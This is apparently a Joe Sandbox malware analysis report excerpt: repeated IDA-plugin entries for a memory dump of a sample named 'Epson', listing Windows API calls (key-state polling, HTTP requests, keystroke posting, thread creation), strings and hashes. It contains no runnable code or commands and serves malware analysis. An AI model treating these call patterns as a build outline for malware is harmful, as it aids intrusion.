                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                      • Opcode ID: 475dc10f56f2792f3a1ce11577f4f0f283a4c13ec03b39f915c3550d4a27bf29
                                                                                                                                                                                                                                      • Instruction ID: 4c246071d906478103f1307351810348dbc2f08778b6094758dbef9658e8d284
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 475dc10f56f2792f3a1ce11577f4f0f283a4c13ec03b39f915c3550d4a27bf29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63710031904205DFDF25DF64DC84ABA3BB1FF48361F24426AEE559A1A6C7358884FF10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: GetCursorPos.USER32(?), ref: 00F519E1
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: ScreenToClient.USER32(00000000,?), ref: 00F519FE
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: GetAsyncKeyState.USER32(00000001), ref: 00F51A23
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: GetAsyncKeyState.USER32(00000002), ref: 00F51A3D
                                                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00FE95C7
                                                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00FE95CD
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00FE95D3
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00FE966E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FE9681
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00FE975B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                      • Opcode ID: a18f3172afc818052d53e7d1a88d1f01304a859930982199d3ba440fb5eb3e93
                                                                                                                                                                                                                                      • Instruction ID: aa3565be112a71337b8b0fbf8da6eba3e74c1fbb9e54d36f43e987e1dfa579c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a18f3172afc818052d53e7d1a88d1f01304a859930982199d3ba440fb5eb3e93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0151DF71204344AFD714EF10CC86FAA77E4FB88765F400A1DFA959B2E2CB759908EB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FCCCB7
                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FCCCDF
                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FCCD0F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FCCD67
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00FCCD7B
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00FCCD86
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 1e97605acb85c315baed11489f75a5f2f7e43c8031bcc57362a42a78d3caf524
                                                                                                                                                                                                                                      • Instruction ID: eec9a3e7c197725b24a117669bbf1751b57c225835c53c17c9a53de0fb49ba97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e97605acb85c315baed11489f75a5f2f7e43c8031bcc57362a42a78d3caf524
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF3191B1900209AFD7219F658D86FAB7BFCEB45750B10452EF45AD6600D734DD08ABA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F955AE,?,?,Bad directive syntax error,00FEDCD0,00000000,00000010,?,?), ref: 00FBA236
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00F955AE,?), ref: 00FBA23D
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FBA301
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                      • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                      • Opcode ID: 710038140fa419ee03a3a8a221d8b6c013fe132de25255dc7a7602d7dce02738
                                                                                                                                                                                                                                      • Instruction ID: c29c117d0eed33b5b96ff8929d85466cb925bccb4a2f5b8a644b6c9389157af0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 710038140fa419ee03a3a8a221d8b6c013fe132de25255dc7a7602d7dce02738
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4221653194021EEFCF11AF90CC46EEE7B75BF18700F444459F6156A062EB7A9618FB11
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00FB29F8
                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00FB2A0D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FB2A9A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                      • Opcode ID: 178bf580f5f6f6e01925f79d387aa9c13d1a9cf513bc914bd51354c56f36310c
                                                                                                                                                                                                                                      • Instruction ID: a5e6243c666858aef8fa4c1832cd891391cda73a26c75caa32a48a4f7bf39241
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 178bf580f5f6f6e01925f79d387aa9c13d1a9cf513bc914bd51354c56f36310c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A11E977644307B9F6246722DC07DE6779CDF15B34B204016F505E9091FBAE68417915
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00F5758D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F575CE
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00F575F6
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00F5773A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F5775B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                      • Opcode ID: 2caaed4d06653e8654e7c5a37c8a9d2ae00c89313dbbdae02952be73e374db79
                                                                                                                                                                                                                                      • Instruction ID: 73fa89446033b93074865fc6c46019a9a4f1ba352c55a3bca6cc2088c3722092
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2caaed4d06653e8654e7c5a37c8a9d2ae00c89313dbbdae02952be73e374db79
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DC1473990464AEBDF10DFA8D580BEDBBB1FF08320F14841AE999E7250D734A945EB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1282221369-0
                                                                                                                                                                                                                                      • Opcode ID: e502976905f241cf96f483955f7d9387d470896782ed77d3ade086f8aae65f5e
                                                                                                                                                                                                                                      • Instruction ID: 28de6561d84529facbc536d82ec5547a476ecd37e7c93f0ec2a8ef0cb8fd6d43
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e502976905f241cf96f483955f7d9387d470896782ed77d3ade086f8aae65f5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41612572D01301AFDF35BF74DC85AEE7BA4AF01330F15416DE944A72C5EA3AA901A791
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FE5C24
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00FE5C65
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00FE5C6B
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FE5C6F
                                                                                                                                                                                                                                        • Part of subcall function 00FE79F2: DeleteObject.GDI32(00000000), ref: 00FE7A1E
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE5CAB
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FE5CB8
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FE5CEB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FE5D25
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FE5D34
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3210457359-0
                                                                                                                                                                                                                                      • Opcode ID: 585028beb4c348db640bc11d8568ae2d296bbdff9b924793dbca35ae3d118575
                                                                                                                                                                                                                                      • Instruction ID: 2d7cae92114fb4e53204fbe3126a39bb8e3d40b58c5ddfc7b65c4db9569c5190
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 585028beb4c348db640bc11d8568ae2d296bbdff9b924793dbca35ae3d118575
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0151A630A40A88BFEF349F2ACC49F983B61FB44B68F244111FA159A1E1C775A980FB51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F928D1
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F928EA
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F928FA
                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F92912
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F92933
                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F511F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F92942
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F9295F
                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F511F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F9296E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                                                                      • Opcode ID: 044269d6d43b8a78d2ee49696cb2237db20f08040bd4e7c09b2fd87207cc0c2d
                                                                                                                                                                                                                                      • Instruction ID: 685a5dbcadf4c2287f0e8c31d981903128bff44157a623f4f6e810f5ed284b87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044269d6d43b8a78d2ee49696cb2237db20f08040bd4e7c09b2fd87207cc0c2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73519A30A00209AFEB24DF25CC85FAA7BB5FF48361F104519FA529B6A0D771E985EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FCCBC7
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FCCBDA
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00FCCBEE
                                                                                                                                                                                                                                        • Part of subcall function 00FCCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FCCCB7
                                                                                                                                                                                                                                        • Part of subcall function 00FCCC98: GetLastError.KERNEL32 ref: 00FCCD67
                                                                                                                                                                                                                                        • Part of subcall function 00FCCC98: SetEvent.KERNEL32(?), ref: 00FCCD7B
                                                                                                                                                                                                                                        • Part of subcall function 00FCCC98: InternetCloseHandle.WININET(00000000), ref: 00FCCD86
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 337547030-0
                                                                                                                                                                                                                                      • Opcode ID: 6dfddf759e1547000d73fd6a72e8ff9f27566c7d7297b677b1d2a6878669736f
                                                                                                                                                                                                                                      • Instruction ID: 3a0371f233a0f56ca5de909edb347a99cad6119ef317bffb0f4b4e1d5db83ac0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dfddf759e1547000d73fd6a72e8ff9f27566c7d7297b677b1d2a6878669736f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4316B71500786AFDB219F61CE85F6ABBE8FF44310B04452DF95E86A10C735E814BBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FB43AD
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: GetCurrentThreadId.KERNEL32 ref: 00FB43B4
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FB2F00), ref: 00FB43BB
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FB2F0A
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FB2F28
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00FB2F2C
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FB2F36
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FB2F4E
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00FB2F52
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FB2F5C
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FB2F70
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00FB2F74
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                                                                                      • Opcode ID: c07cbc87ec1c78fcd085ca13f3347c5f3c5acc097191bb84df33a0bd3a14d691
                                                                                                                                                                                                                                      • Instruction ID: 35acc3bccb90fc75185009c5162821aca47941fe5d43c4bf58d0d33e09bd9afe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c07cbc87ec1c78fcd085ca13f3347c5f3c5acc097191bb84df33a0bd3a14d691
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201D8317842147BFB106769DCCAF593F59DB4EB11F100011F318AE1E1C9E66444EEA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00FB1D95,?,?,00000000), ref: 00FB2159
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00FB1D95,?,?,00000000), ref: 00FB2160
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FB1D95,?,?,00000000), ref: 00FB2175
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00FB1D95,?,?,00000000), ref: 00FB217D
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00FB1D95,?,?,00000000), ref: 00FB2180
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FB1D95,?,?,00000000), ref: 00FB2190
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00FB1D95,00000000,?,00FB1D95,?,?,00000000), ref: 00FB2198
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00FB1D95,?,?,00000000), ref: 00FB219B
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00FB21C1,00000000,00000000,00000000), ref: 00FB21B5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                      • String ID:
